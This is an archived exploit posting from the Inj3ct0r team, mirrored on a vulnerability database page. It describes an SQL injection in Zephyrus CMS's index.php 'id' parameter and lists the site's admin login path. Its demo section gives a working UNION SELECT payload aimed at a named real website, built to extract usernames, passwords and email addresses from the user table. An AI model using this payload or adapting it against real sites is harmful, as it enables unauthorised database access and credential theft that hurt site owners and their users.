Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23426
HistoryMar 23, 2010 - 12:00 a.m.

Zephyrus CMS (index.php) SQL Injection Vulnerability

2010-03-2300:00:00
vulners.com
12

====================================================
Zephyrus CMS (index.php) SQL Injection Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm Phenom member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: Phenom
[+] My id: http://inj3ct0r.com/author/2157
[+] Original: http://inj3ct0r.com/exploits/11409

#[Exploit Title] : CMS Zephyrus (index.php) SQL Injection Vulnerability

[Author] = Phenom

[CMS] = CMS Zephyrus

[Dork] = I hate script kiddies

[Date] = 2010-03-23

#[Exploit] :

[Bug] = [index.php?pagina=news&id=]

[Usage] = http://www.site/index.php?pagina=news&amp;id=[SQL Injection]

[Login] = http://site/index_priv.php

#[Demo] :

[+]
http://www.amicinsiemeviareggio.it/index.php?pagina=news&amp;id=-68+union+select+1,group_concat&#37;28concat&#37;28username,0x3a,password,0x3a,email&#37;29&#37;20separator&#37;200x3c62723e&#37;29,3,4,5,6,7,8,9,10+from+utenti--

#[Thanks] :

[+] all Inj3ct0r Members

Inj3ct0r.com [2010-03-23]